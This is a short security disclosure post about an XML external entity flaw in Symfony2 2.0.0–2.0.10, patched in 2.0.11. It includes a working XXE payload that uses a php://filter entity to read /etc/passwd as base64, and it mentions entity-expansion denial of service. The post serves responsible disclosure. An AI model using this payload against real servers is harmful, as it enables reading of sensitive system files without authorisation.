I recently discovered a vulnerability affecting the Symfony2 Framework versions 2.0.0-2.0.10.In short, by by parsing user supplied XML in any way (e.g. SOAP API, RSS feed, unserializing an object) it is possible to disclose the contents of arbitrary files from the local file system. Symfony announced a new security release version 2.0.11 within 24hrs of being notified of the vulnerability. You can read more on the Symfony Blog.
The vulnerability occurs because Symfony2 fails to disable external entities before parsing XML. As explained in my previous post this is particularly brutal in PHP where PHP filters can be used to include binary data or scan behind perimeter firewalls.
In the example below XML is deserialized and the contents of /etc/passwd are returned as a base64 encoded string.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | $XMLString = ' <?xml version="1.0"?> <!DOCTYPE scan [ <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd" > ]> <scan>&test; </scan> ' $serializer = new Serializer(array(), array( 'xml' => new \Symfony\Component\Serializer\Encoder\XmlEncoder() )); $x = $serializer->decode($XMLString, 'xml'); var_dump($x); |
If the deserialized XML is not displayed to the end user you can still perform a Denial of Service attack through XML entity expansion.